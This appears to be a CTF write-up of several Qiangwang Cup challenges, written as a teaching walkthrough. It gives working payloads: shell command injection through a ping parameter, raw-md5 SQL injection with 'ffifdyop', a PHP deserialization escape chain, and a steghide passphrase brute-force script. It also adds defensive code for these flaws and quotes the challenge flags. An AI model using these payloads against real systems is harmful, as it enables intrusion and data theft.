强网先锋 (Qiangwang Pioneer category)
主动 (Proactive)
The challenge page looks like this; it is obviously about command execution with a character filter to bypass:
<?php
highlight_file("index.php");
if(preg_match("/flag/i", $_GET["ip"]))
{
    die("no flag");
}
system("ping -c 3 $_GET[ip]");
?>
Several commands can be run in one request: a semicolon ; or a pipe | terminates the previous command. There are plenty of bypasses for the filter, easy to find online, so I will not repeat them here; payloads:
?ip=;cat `ls`
?ip=;cat `echo 'Li9mbGFnLnBocAo=' | base64 -d`
?ip=;cat ./fla'g'.php
?ip=;cat ./fl\ag.php
?ip=;cat ./fl''ag.php
?ip=;cat ./fl""ag.php
?ip=;a=fl;b=ag;cat ./$a$b.php
?ip=;cat ./fl${9}ag.php
.......
View the page source to read the flag.
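The reason every payload above gets through is that the challenge only blocks the keyword flag instead of validating the parameter. The following is an added example (not code from the writeup or the challenge) that mirrors the blocklist and contrasts it with an allowlist: the parameter must parse as a literal IP address and ping is invoked as an argument vector, so no shell ever sees the input. The function and variable names are my own.

```python
import ipaddress
import re
import subprocess

# The challenge's only defence: preg_match("/flag/i", $_GET["ip"]) -> a keyword blocklist
BLOCKLIST = re.compile(r"flag", re.IGNORECASE)


def passes_blocklist(ip: str) -> bool:
    """True when the challenge's filter would let this value through unchanged."""
    return BLOCKLIST.search(ip) is None


def is_valid_ip(ip: str) -> bool:
    """Allowlist check: the value must parse as a literal IPv4/IPv6 address, nothing else."""
    try:
        ipaddress.ip_address(ip.strip())
        return True
    except ValueError:
        return False


def build_ping_argv(ip: str) -> list:
    """Argument vector for ping; without a shell, characters like ; | ` $ carry no meaning."""
    if not is_valid_ip(ip):
        raise ValueError("ip parameter is not an IP address")
    return ["ping", "-c", "3", ip.strip()]


def ping(ip: str) -> str:
    """Run ping in list form (no shell=True) and return its combined output."""
    result = subprocess.run(build_ping_argv(ip), capture_output=True, text=True)
    return result.stdout + result.stderr


if __name__ == "__main__":
    # constructed inputs: the writeup's own payload next to an honest address
    for candidate in ("127.0.0.1", ";cat ./fl\\ag.php", "flag.php"):
        print(f"{candidate!r}: blocklist passes={passes_blocklist(candidate)} "
              f"allowlist passes={is_valid_ip(candidate)}")
```

The blocklist accepts ;cat ./fl\ag.php because the regex never sees the word flag, while the allowlist rejects it because it is not an address; that is the whole difference between the two designs.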
upload
Download the attachment: it is a packet capture. Open it in Wireshark, filter on http packets and follow the stream.
It is clearly a POST upload of an image.
File->Export Objects->HTTP..., then Save all to write the files out; you get the following:
%5c
There is a hint: something is hidden with steghide.
steghide.php
Open it in Notepad++, delete the first four lines, save it with the extension changed to jpg or png (either works) and you get the image below:
Then drop the image into Kali and use steghide to extract the hidden data.
It is protected by a passphrase, so grab a steghide passphrase brute-force script from the web:
# -*- coding: utf8 -*-
# Python 3 port of the script (the original was Python 2); steghide is called
# directly, without a shell, so passphrases containing quotes are passed intact.
from subprocess import Popen, PIPE, STDOUT

def foo():
    stegoFile = 'a.jpg'        # name of the cover image
    extractFile = 'hide.txt'   # where the hidden content extracted from the image is written
    passFile = 'english.dic'   # wordlist; the author used the Advanced Archive Password Recovery dictionary
    errors = ['could not extract', 'steghide --help', 'Syntax error']
    with open(passFile, 'r', errors='ignore') as f:
        for line in f:
            passphrase = line.strip()
            # -f overwrites an existing output file so steghide never waits for a prompt
            cmd = ['steghide', 'extract', '-sf', stegoFile, '-xf', extractFile, '-p', passphrase, '-f']
            p = Popen(cmd, stdout=PIPE, stderr=STDOUT)
            # the author's console was GBK; ignore undecodable bytes on other locales
            content = p.stdout.read().decode('gbk', errors='ignore')
            for err in errors:
                if err in content:
                    break
            else:
                print(content, end='')
                print('the passphrase is %s' % passphrase)
                return

if __name__ == '__main__':
    foo()
    print('ok')
The passphrase is: 123456
hide.txt now holds the extracted flag; alternatively run steghide extract -sf a.jpg, enter the passphrase and get flag.txt:
flag{te11_me_y0u_like_it}
Funhash
<?php
include 'conn.php';
highlight_file("index.php");
//level 1
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
    die('level 1 failed');
}
//level 2
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
    die('level 2 failed');
}
//level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc();
var_dump($row);
$result->free();
$mysqli->close();
?>
level 1
When PHP compares with ==, a string consisting of 0e followed only by digits is read as scientific notation and evaluates to 0; this applies to md4 and md5 output alike. So we only need a value that starts with 0e and whose hash also starts with 0e (followed by digits). Two found online:
PS C:\Users\Administrator> php -r "var_dump(hash('md4','0e251288019'));"
string(32) "0e874956163641961271069404332409"
PS C:\Users\Administrator> php -r "var_dump(hash('md4','0e001233333333333334557778889'));"
string(32) "0e434041524824285414215559233446"
?hash1=0e251288019
?hash1=0e001233333333333334557778889
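To check a candidate like the two above without relying on PHP, the following added example (my own code, not from the writeup) implements MD4 in pure Python, reproduces the numeric-string rule behind PHP's == (both operands numeric, so they are compared as floats), and shows the strict comparison that closes the hole. The helper names are my own; the magic value is the one quoted above.

```python
import hmac
import re
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); avoids depending on an OpenSSL md4 provider."""
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:          # pad to 56 mod 64, then append the bit length
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + fn(b, c, d) + X[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate the working variables
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    return struct.pack("<4I", A, B, C, D)


# A PHP "numeric string": optional sign, digits/decimal point, optional exponent.
NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_eq(a: str, b: str) -> bool:
    """PHP's == on two strings: numeric strings are compared by value, so 0e... == 0e..."""
    if NUMERIC.match(a) and NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def strict_eq(a: str, b: str) -> bool:
    """What the check should have used (===/hash_equals): same bytes, constant time."""
    return hmac.compare_digest(a.encode(), b.encode())


def is_magic_md4(candidate: str) -> bool:
    """True when candidate == hash('md4', candidate) under PHP's loose comparison."""
    return php_loose_eq(candidate, md4(candidate.encode()).hex())


if __name__ == "__main__":
    for cand in ("0e251288019", "0e001233333333333334557778889", "hello"):
        print(cand, md4(cand.encode()).hex(), "loose:", is_magic_md4(cand),
              "strict:", strict_eq(cand, md4(cand.encode()).hex()))
```

The same php_loose_eq function explains the classic md5 magic hashes too; only the digest routine changes.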
level 2
The md5 check uses ===; pass arrays instead of strings, with different values, and it is bypassed (md5() of an array returns NULL in PHP 7, so the two md5 results are identical while the arrays themselves are not):
&hash2[]=2&hash3=3
level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
The spot where the md5 is spliced into the query immediately brings to mind the string ffifdyop: md5(string, raw) turns it into 'or'6]!r,b and, inserted here, the query becomes select * from flag where password='' or '6]!r,b', which MySQL evaluates as '' or 1. The injection returns the flag:
&hash4=ffifdyop
payload:
?hash1=0e251288019&hash2[]=2&hash3[]=3&hash4=ffifdyop
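The level 3 trick only works because the raw digest is concatenated into SQL. The following added example (my own, not from the writeup) reproduces it against an in-memory SQLite table and contrasts it with two fixes: binding the digest as a parameter, and using the hex form of md5 (whose alphabet cannot contain a quote). The table contents and function names are constructed for the demo; MySQL and SQLite both treat the '6]!r,b' operand as a true value because it starts with a digit.

```python
import hashlib
import sqlite3


def raw_md5_as_text(s: str) -> str:
    """PHP's md5($x, true): 16 raw bytes; latin-1 maps each byte to one character."""
    return hashlib.md5(s.encode()).digest().decode("latin-1")


def unsafe_query(hash4: str) -> str:
    """String concatenation exactly like the challenge's level 3."""
    return "SELECT * FROM flag WHERE password = '" + raw_md5_as_text(hash4) + "'"


def make_db() -> sqlite3.Connection:
    # constructed table: one row whose password is not derivable from any input
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE flag (password TEXT)")
    con.execute("INSERT INTO flag VALUES (?)", ("secret-not-derived-from-input",))
    return con


def rows_unsafe(con, hash4: str):
    """Vulnerable: the digest bytes ' o r ' break out of the literal."""
    return con.execute(unsafe_query(hash4)).fetchall()


def rows_safe(con, hash4: str):
    """Fix 1: bind the value; the digest is data, never SQL."""
    return con.execute("SELECT * FROM flag WHERE password = ?",
                       (raw_md5_as_text(hash4),)).fetchall()


def rows_hex(con, hash4: str):
    """Fix 2 (weaker, but shows why the raw flag matters): hex output is [0-9a-f] only."""
    return con.execute("SELECT * FROM flag WHERE password = '"
                       + hashlib.md5(hash4.encode()).hexdigest() + "'").fetchall()


if __name__ == "__main__":
    con = make_db()
    print(repr(raw_md5_as_text("ffifdyop")))
    print("unsafe:", rows_unsafe(con, "ffifdyop"))
    print("bound :", rows_safe(con, "ffifdyop"))
    print("hex   :", rows_hex(con, "ffifdyop"))
```

Only the concatenated raw-digest query returns the row; a search over a wordlist for other inputs whose raw digest contains a quote is the same check, just with more candidates.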
web辅助 (web assist)
Source tree:
└── html
├── !
├── caches
│ └── md5($_SERVER['REMOTE_ADDR']
├── class.php
├── common.php
├── index.php
└── play.php
POP chain + deserialization string escape
<?php
class player{
    protected $user;
    protected $pass;
    protected $admin;
    public function __construct($user, $pass, $admin = 0){
        $this->user = $user;
        $this->pass = $pass;
        $this->admin = $admin;
    }
    public function get_admin(){
        return $this->admin;
    }
}
class topsolo{
    protected $name;
    public function __construct($name = 'Riven'){
        $this->name = $name;
    }
    public function TP(){
        if (gettype($this->name) === "function" or gettype($this->name) === "object"){
            $name = $this->name;
            $name();
        }
    }
    public function __destruct(){
        $this->TP();
    }
}
class midsolo{
    protected $name;
    public function __construct($name){
        $this->name = $name;
    }
    public function __wakeup(){
        if ($this->name !== 'Yasuo'){
            $this->name = 'Yasuo';
            echo "No Yasuo! No Soul!\n";
        }
    }
    public function __invoke(){
        $this->Gank();
    }
    public function Gank(){
        if (stristr($this->name, 'Yasuo')){
            echo "Are you orphan?\n";
        }
        else{
            echo "Must Be Yasuo!\n";
        }
    }
}
class jungle{
    protected $name = "";
    public function __construct($name = "Lee Sin"){
        $this->name = $name;
    }
    public function KS(){
        system("cat /flag");
    }
    public function __toString(){
        $this->KS();
        return "";
    }
}
?>
The POP chain here is simple:
topsolo::__destruct()->topsolo::TP()->midsolo::__invoke()->midsolo::Gank()->jungle::__toString()->jungle::KS()
The only controllable points are $username and $password:
//index.php
$username = $_GET['username'];
$password = $_GET['password'];
$player = new player($username, $password);
file_put_contents("caches/".md5($_SERVER['REMOTE_ADDR']), write(serialize($player)));
Clearly these two controllable values cannot, by themselves, make the deserialization build the other classes we want, so we need to escape out of the serialized string:
//common.php
function read($data){
    $data = str_replace('\0*\0', chr(0)."*".chr(0), $data);
    return $data;
}
function write($data){
    $data = str_replace(chr(0)."*".chr(0), '\0*\0', $data);
    return $data;
}
In index.php, write(serialize($player)) applies write() after serialization, and read() is applied to the stored data before it is unserialized. That lets us overflow the serialized string through $username and $password: \0*\0 is 5 characters long and chr(0)."*".chr(0) is 3, so every \0*\0 that read() turns back into chr(0)."*".chr(0) frees up 2 character positions.
First, look at the length of the serialized string produced by the POP chain:
<?php
// stripped-down copies of the three classes, used only to produce the serialized chain
class topsolo{
    protected $name;
    public function __construct($name = 'Riven'){
        $this->name = new midsolo($name);
    }
}
class midsolo{
    protected $name;
    public function __construct($name){
        $this->name = new jungle($name);
    }
}
class jungle{
    protected $name="";
}
$res = new topsolo();   // $name was undefined in the original snippet; the default is used
echo serialize($res);
?>
This gives the following string, 102 characters long (\x00 stands for a NUL byte, which the original output shows as a space):
O:7:"topsolo":1:{s:7:"\x00*\x00name";O:7:"midsolo":1:{s:7:"\x00*\x00name";O:6:"jungle":1:{s:7:"\x00*\x00name";s:0:"";}}}
Now the serialized form of the player class:
<?php
class player{
    protected $user;
    protected $pass;
    protected $admin;
    public function __construct($user, $pass, $admin = 0){
        $this->user = $user;
        $this->pass = $pass;
        $this->admin = $admin;
    }
    public function get_admin(){
        return $this->admin;
    }
}
$res = new player(null, null);   // $user/$pass were undefined in the original, so both serialize as N (null)
echo serialize($res);
?>
This gives the following string (again \x00 is a NUL byte):
O:6:"player":3:{s:7:"\x00*\x00user";N;s:7:"\x00*\x00pass";N;s:8:"\x00*\x00admin";i:0;}
So the string that has to be swallowed is ;s:7:"\x00*\x00pass";s:102:" with length 22. Each \0*\0 escapes two characters, so a length of 22 needs 11 of them:
username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0
password=;s:7:" * pass";O:7:"topsolo":1:{
s:7:" * name";O:7:"midsolo":1:{
s:7:" * name";O:6:"jungle":1:{
s:7:" * name";s:0:"";}}}
Then, because the properties are protected, replace * with %00*%00 (or \00*\00). The challenge also tests a few small tricks.
Bypassing __wakeup: declare more properties on the object than it really has.
//class.php
public function __wakeup(){
    if ($this->name !== 'Yasuo'){
        $this->name = 'Yasuo';
        echo "No Yasuo! No Soul!\n";
    }
}
Bypassing the check for the string name: change the lowercase s type letter of the property name to uppercase S and write the name with a hex escape.
//common.php
function check($data)
{
    if(stristr($data, 'name')!==False){
        die("Name Pass\n");
    }
    else{
        return $data;
    }
}
Putting it all together:
username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0
password=;s:7:"%00*%00pass";O:7:"topsolo":1:{
S:7:"%00*%00\6eame";O:7:"midsolo":2:{
S:7:"%00*%00\6eame";O:6:"jungle":1:{
S:7:"%00*%00\6eame";s:0:"";}}}
?username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=;s:7:"%00*%00pass";O:7:"topsolo":1:{
S:7:"%00*%00\6eame";O:7:"midsolo":2:{
S:7:"%00*%00\6eame";O:6:"jungle":1:{
S:7:"%00*%00\6eame";s:0:"";}}}
Send the payload, then visit play.php to trigger the deserialization.
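The length arithmetic above (5 characters in, 3 out, 22 characters to swallow, 11 units) is easy to get wrong by hand. The following added example (my own code, not the challenge's) models the challenge's serialize/write/read in Python so the numbers can be checked, and adds the check a defender would want: the storage transform must round-trip the exact serialized string, which it fails to do as soon as a user value already contains the 5-character literal. A length-preserving encoding such as base64 is shown as the replacement. Function names are mine; the serialization format is PHP's.

```python
import base64
import math

NUL = "\x00"
PROT = NUL + "*" + NUL        # PHP names a protected property "\0*\0name" (real NUL bytes)
ESCAPED = r"\0*\0"            # the 5-character literal that write() stores instead


def php_str(s: str) -> str:
    """PHP serializes a string as s:<byte length>:"<bytes>"; (ASCII/NUL input only here)."""
    return f's:{len(s)}:"{s}";'


def serialize_player(user: str, pw: str, admin: int = 0) -> str:
    """Reproduces serialize(new player($user, $pass)) from the challenge."""
    return ('O:6:"player":3:{'
            + php_str(PROT + "user") + php_str(user)
            + php_str(PROT + "pass") + php_str(pw)
            + php_str(PROT + "admin") + f"i:{admin};" + "}")


def write(data: str) -> str:
    """common.php write(): applied after serialize(), before storing."""
    return data.replace(PROT, ESCAPED)


def read(data: str) -> str:
    """common.php read(): applied to the stored data before unserialize()."""
    return data.replace(ESCAPED, PROT)


def roundtrip_ok(serialized: str) -> bool:
    """Defender's check: read(write(x)) must equal x. It does not when a user-supplied
    value already contains the literal \\0*\\0, because read() cannot tell it apart
    from an escaped property name and shrinks it by two bytes per occurrence."""
    return read(write(serialized)) == serialized


def units_needed(swallow_len: int) -> int:
    """Each literal unit shrinks by 2 bytes in read() while the declared s:N length stays,
    so the parser over-reads 2 bytes per unit; swallowing N bytes needs ceil(N/2) units."""
    return math.ceil(swallow_len / 2)


def write_safe(data: str) -> str:
    """Replacement storage encoding: bijective, so no input can change declared lengths."""
    return base64.b64encode(data.encode("latin-1")).decode()


def read_safe(data: str) -> str:
    return base64.b64decode(data).decode("latin-1")


if __name__ == "__main__":
    honest = serialize_player("alice", "pw")
    hostile = serialize_player(ESCAPED * units_needed(22), "x")   # constructed, mirrors the writeup
    print("honest round-trips :", roundtrip_ok(honest))
    print("hostile round-trips:", roundtrip_ok(hostile))
    print("bytes lost on read :", len(hostile) - len(read(write(hostile))))
    print("base64 round-trips :", read_safe(write_safe(hostile)) == hostile)
```

The hostile string loses exactly 22 bytes between write() and read(), which is why 11 units line the parser up with the attacker's password value; the base64 pair loses none.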
Misc
签到 (Sign-in)
Good grief, just once let me get first blood on a sign-in challenge~
flag{welcome_to_qwb_S4}
问卷调查 (Survey)
Ugh, the survey only came out at the very end of the competition and I never saw it; by the time I noticed, it was already over…orz
flag{Welc0me_tO_qwbS4_Hope_you_play_h4ppily}
miscstudy
Hint: the flag for this challenge consists of 7 parts. The first part is flag{level1..., the last part is !!!}. Each level holds one part of the flag; concatenating all the parts gives the final flag.
Download and unzip the attachment: it is a packet capture. Open it, filter on http packets and visit the URL shown to get the level1 and level2 flags:
flag{level1_begin_and_level2_is_come
Besides the flag, the other parameters on that page are obviously a TLS (Pre)-Master-Secret log file. Save them as ket.txt.
In Wireshark, under Edit->Preferences->Protocols->TLS->(Pre)-Master-Secret log filename, select ket.txt and click OK.
With the keys loaded, look at the http packets again: there is one more packet.
Save the image and examine it in a hex editor such as 010 Editor or WinHex.
After the IDAT tags of chunk8-chunk11 there is base64-looking text. Apart from chunk11, the chunks' base64 obviously decodes to long runs of 0s and 1s; chunk11's content after IDAT is different. Copy it out and decode it:
level3_start_it
The base64 from the three chunks chunk8-chunk10 is:
MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTExMTExMTExMTEwMDAwMDAwMTAwMTEwMDAwMTAwMDAwMDAwMDExMTAwMDAxMTExMTExMTExMTAwMDAxMTExMTExMTExMTEwMDAwMDAwMTEwMTExMDAwMTAwMDAwMDAwMDExMTAwMDAxMTExMTExMTExMTAwMDAxMTAwMDAwMDAwMTEwMDEwMDExMTExMTEwMDEwMDAwMDAwMDAxMTAwMTExMDAxMDAwMDAwMDAwMTAwMDAxMTAwMDAwMDAwMTEwMDEwMDAwMTEwMTEwMDEwMDAwMDAwMDAwMDAxMTExMDAxMDAwMDAwMDAwMTAwMDAxMTAwMTExMTAwMTEwMDEwMDAwMTAwMTEwMDEwMDExMTAwMDAwMDExMTAxMDAxMDAxMTExMTAwMTAwMDAxMTAwMTExMTAwMTEwMDAwMTAwMDAwMDAxMTEwMDExMTExMTEwMDEwMDAwMDAxMDAxMTExMTAwMTAwMDAxMTAwMTExMTAwMTEwMDAwMDAwMDAwMDAxMTEwMDExMTEwMTEwMDEwMDAwMDAxMDAxMTExMTAwMTAwMDAxMTAwMTExMTAwMTEwMDExMTAwMTAwMTExMTExMTExMTAwMTEwMDExMTAwMDAwMDAxMTExMTAwMTAwMDAxMTAwMDAwMDAwMTEwMDExMDAwMDAwMDAwMTExMTAwMTEwMTEwMTEwMDAwMDAxMDAwMDAwMDAwMTAwMDAxMTAwMDAwMDAwMTEwMDEwMDExMDAwMDAwMDExMTAwMDExMTExMTEwMDExMDAxMDAwMDAwMDAwMTAwMDAxMTExMTExMTExMTEwMDEwMDExMDAxMDAxMDAxMTAwMTEwMTEwMDEwMDExMDAxMTExMTExMTExMTAwMDAxMTExMTExMTExMTEwMDEwMDExMDAxMDAxMTAwMDAwMTAwMTEwMDEwMDExMDAxMTExMTExMTExMTAwMDAwMDAwMDAwMDAwMDAwMDEwMDExMTExMTEwMDEwMDExMDAwMTExMDAwMTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDEwMDAxMTExMTAwMDEwMDExMDAwMDExMTAxMTAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDAwMTExMTAwMDAwMDAxMDAwMDAwMDExMDAwMDAxMTExMTExMDAxMTExMDAwMTExMDAwMDAwMTEwMDAwMDAwMDAwMDAwMDAwMDAxMDAwMDAwMDExMDAwMDAwMDAwMDExMDAxMDAwMDAwMDAwMDAwMDAwMDEwMDAwMDAxMDAwMDExMTAwMDAxMDAwMDAwMTExMTAwMTEwMDAwMDExMDAwMDAwMDEwMDAwMDAwMDAxMTEwMDExMDAxMTExMTEwMDAwMDAwMDAwMDAwMDEwMDAxMDAxMTEwMDExMTExMDAwMDEwMDExMDAwMDAxMTEwMDExMDAxMTExMTEwMDAwMDAwMDAwMDAwMDExMDAxMDAxMTEwMDExMTExMDAwMDEwMDExMDAwMDAxMTAwMTExMDAwMDAwMDExMTExMDAwMDAwMDEwMDAwMTAwMDAwMTAwMTAwMTExMDAwMDAwMTAwMTAwMDAwMDAxMTAwMDAwMDAwMTExMDExMDAwMDAwMTExMDAwMTAwMDAxMTAwMDAwMTExMDAwMDAwMDAwMDAwMDAwMDExMTAwMDAwMTExMTEwMDExMDAwMDAxMTExMTExMTAwMDAxMTAwMDExMTExMTEwMDEwMDAwMDAwMDAwMDAwMTExMDAxMDAxMTAwMDAwMDAwMDAxMTAwMDAwMTExMDAxMTEwMDExMTExMDAxMDAwMTAwMTAw
MDAwMDAwMTExMDAxMDAxMDAwMDAwMDAwMDAxMDAwMDAwMTExMDAxMTEwMDExMTExMDAxMTAwMTAwMTAwMDAwMDExMTAwMDAwMTEwMDExMTExMTExMDAwMDAwMDExMTAwMDAxMTExMTExMDAwMDAxMTEwMDExMTAwMDAwMDExMDAwMDAwMDEwMDExMTExMTEwMDAwMDAwMDExMTAwMDAxMTExMTExMDAwMDAwMTEwMDAxMTAwMDAwMDAwMDAwMTAwMDAwMDEwMDAwMDAwMDAwMDAwMDExMDAwMDAxMTEwMDExMDAxMDAwMDAwMTAwMTAwMDAwMDAwMDAwMDAwMDAwMTEwMDAwMDAwMDAwMDAwMDAwMDAwMDAxMTEwMDExMDExMTAwMDAwMDAwMDAwMDAwMDEwMDAxMDAxMTExMTEwMDAwMTAwMDAwMDAwMTAwMDAwMDExMTExMTExMTAxMTExMTAwMDAwMDAwMDAwMDExMDAwMDAwMDAxMTEwMDAwMDAwMTExMTExMTAwMTEwMDAwMDAxMTAwMDAwMDAwMDEwMDAwMDAwMDAwMDExMTAwMDAwMDAxMTEwMDAwMDAwMTExMTExMTAwMTExMDAwMDAwMTAwMDAwMDAwMDEwMDAwMDAwMDAxMTEwMDAwMTAwMTExMTExMTExMTExMDAwMDAwMDExMTAwMTExMDAwMDExMDAwMDAxMTAwMDAwMDAwMDAxMTExMDAwMTEwMDAxMDAxMTAwMTExMDAwMDAwMDExMDAwMDExMTAwMDExMDAwMDAwMDAwMDAwMDAwMDAxMTExMTAwMTExMDAxMTAwMTAwMTAxMTExMTExMTExMDAxMTExMTAwMDAxMDAxMTEwMDExMTExMTAwMDAxMTAwMDAwMTExMTEwMDAwMTAwMDAwMDAwMDEwMDAwMDAwMTExMTAwMDExMDAwMDAwMDExMTAwMTAwMDAxMDAwMDAwMTExMTEwMDAwMTAwMDAwMDAwMDEwMDAwMDAwMTExMDAwMDExMDAwMDAwMDExMTAwMTAwMDAwMDExMDExMTAwMDAwMDExMTAwMDAwMDAwMDAwMDAwMDAxMTEwMDAwMDExMTExMDAwMDAxMTAwMTAwMDAwMTExMTExMTAwMDAwMDExMDAwMDAwMDAwMDAwMDAwMDExMTAwMDAwMDAxMTAxMDAwMDAwMTAwMTAwMDAxMTExMTAwMDAwMTEwMDEwMDAwMTAwMDAwMDAwMDExMTExMDAwMDEwMDAwMDAwMDAxMTAwMDEwMDAwMDAwMTExMTAwMDAwMDAwMDEwMDAwMTEwMDAwMDAwMDAwMDAwMDAwMTEwMDAwMDAwMDAxMTAwMDAwMDAwMDAwMDExMTAwMTAwMDAwMDEwMDExMTExMDAwMDExMTAwMDAwMDAxMTEwMDAwMDAwMTExMDAwMTAwMDAwMDAxMTAwMTExMDAwMTExMTEwMDExMTExMDAxMTExMTExMTAwMDAxMDEwMDExMTExMTExMTAwMDExMDAwMDAxMDAwMTExMDAwMTExMTEwMDExMTExMDAxMTExMTExMTAwMDAxMTEwMDExMDExMTExMTAwMDExMDAwMDAwMDAwMDAwMDAwMDAwMDEwMDExMDAxMDAxMTEwMDAwMDAxMTEwMDAxMTExMDAwMDAxMTAwMDAwMTAwMDAwMDAwMDAwMDAwMDAwMDEwMDExMDAwMDAxMTAwMDAwMDAwMTEwMDAwMDExMDAwMDAxMTAwMDAwMTAwMDAxMTExMTExMTExMTEwMDEwMDExMDAwMTExMDAwMTEwMDAwMTExMTAwMDExMDAxMDAxMTAwMTExMTAwMDAxMTAwMDAwMDAwMTEwMDAwMTExMTAwMDAwMDExMTExMTExMDAxMTEwMDAxMDAwMDAxMTAwMTExMDAwMDAxMTAwMDAwMDAwMTEwMDAwMTExMTAwMDAwMDExMTExMTExMDAxMTEwMDExMDAwMDAxMTAwMTExMDAw
MDAxMTAwMTExMTAwMTEwMDAwMTAwMDAxMDAwMDAwMTAwMDAxMDAxMTEwMDExMTExMTExMTAwMDAwMDAwMDAxMTAwMTExMTAwMTEwMDAwMTAwMDAxMDAwMDAxMTAwMDAxMDAxMTAwMDAxMTExMTExMDAwMDAwMDAwMDAxMTAwMTExMTAwMTEwMDEwMDExMDAwMTExMTExMTExMDAwMTExMTEwMDAwMTExMDAwMDExMDExMTAwMDAxMTAwMTExMTAwMTEwMDAwMDExMDAwMTEwMDAwMDAwMDAwMDAwMTEwMDAwMDAwMDAwMDExMDExMTAwMDAxMTAwMTExMTAwMTEwMDAwMDExMTExMTEwMDAwMDAwMTAwMDAxMTEwMDExMDAwMDAwMDAwMDExMTAwMDAxMTAwMDAwMDAwMTEwMDExMTAwMTAwMTExMDAwMDExMDAxMTExMTAwMDExMTExMTExMTExMTAwMDAwMDAxMTAwMDAwMDAwMTEwMDExMTAwMTAwMTExMDAwMDExMDAxMTExMTAwMDExMTExMTExMTExMTAwMDAwMDAxMDExMTExMTExMDEwMDEwMDExMTExMTEwMDExMTExMDAxMDAxMTEwMDExMTExMTAwMDAwMDExMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw
base64-decoded:
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111111000000010011000010000000001110000111111111110000111111111111000000011011100010000000001110000111111111110000110000000011001001111111001000000000110011100100000000010000110000000011001000011011001000000000000111100100000000010000110011110011001000010011001001110000001110100100111110010000110011110011000010000000111001111111001000000100111110010000110011110011000000000000111001111011001000000100111110010000110011110011001110010011111111110011001110000000111110010000110000000011001100000000011110011011011000000100000000010000110000000011001001100000001110001111111001100100000000010000111111111111001001100100100110011011001001100111111111110000111111111111001001100100110000010011001001100111111111110000000000000000001001111111001001100011100010000000000000000000000000000000001000111110001001100001110110000000000000000000111001100011110000000100000001100000111111100111100011100000011000000000000000000100000001100000000001100100000000000000001000000100001110000100000011110011000001100000001000000000111001100111111000000000000001000100111001111100001001100000111001100111111000000000000001100100111001111100001001100000110011100000001111100000001000010000010010011100000010010000000110000000011101100000011100010000110000011100000000000000001110000011111001100000111111110000110001111111001000000000000011100100110000000000110000011100111001111100100010010000000011100100100000000000100000011100111001111100110010010000001110000011001111111100000001110000111111100000111001110000001100000001001111111000000001110000111111100000011000110000000000010000001000000000000001100000111001100100000010010000000000000000011000000000000000000000111001101110000000000000001000100111111000010000000010000001111111110111110000000000001100000000111000000011111110011000000110000000001000000000001110000000111000000011111110011100000010000000001000000000111000010011111111
1111000000011100111000011000001100000000001111000110001001100111000000011000011100011000000000000000001111100111001100100101111111111001111100001001110011111100001100000111110000100000000010000000111100011000000011100100001000000111110000100000000010000000111000011000000011100100000011011100000011100000000000000001110000011111000001100100000111111100000011000000000000000011100000001101000000100100001111100000110010000100000000011111000010000000001100010000000111100000000010000110000000000000000110000000001100000000000011100100000010011111000011100000001110000000111000100000001100111000111110011111001111111100001010011111111100011000001000111000111110011111001111111100001110011011111100011000000000000000000010011001001110000001110001111000001100000100000000000000000010011000001100000000110000011000001100000100001111111111110010011000111000110000111100011001001100111100001100000000110000111100000011111111001110001000001100111000001100000000110000111100000011111111001110011000001100111000001100111100110000100001000000100001001110011111111100000000001100111100110000100001000001100001001100001111111000000000001100111100110010011000111111111000111110000111000011011100001100111100110000011000110000000000000110000000000011011100001100111100110000011111110000000100001110011000000000011100001100000000110011100100111000011001111100011111111111100000001100000000110011100100111000011